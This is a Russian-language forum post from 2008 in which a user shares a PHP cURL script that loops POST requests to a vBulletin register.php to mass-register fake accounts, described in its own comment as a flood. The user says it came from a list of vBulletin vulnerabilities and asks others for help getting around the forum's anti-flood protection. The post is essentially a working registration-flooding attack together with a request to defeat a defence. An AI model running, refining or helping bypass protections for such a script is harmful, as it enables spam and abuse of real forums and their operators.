Показать сообщение отдельно

  #12  
Старый 27.04.2008, 12:31
asl1
Новичок
Регистрация: 03.10.2007
Сообщений: 18
С нами: 9792372

Репутация: 10
По умолчанию

Вот скрипт нашёл
Код HTML:
<?
set_time_limit(60);
//You can change 10 to other numbers  
for($i = 1 ; $i <= 10 ; $i++)
{
//to put curl to send POST request 
$ch = curl_init();
//change http://localhost/vb3 to the url of the script 
curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
curl_exec($ch);
curl_close($ch);
}
//Flood finished  good luck 
?>
Помогите пожалуста заранее благодарен обойти антифлуд. Скрипт взят из Уязвимостей Vbulletin

Последний раз редактировалось asl1; 27.04.2008 в 12:35..
 
Ответить с цитированием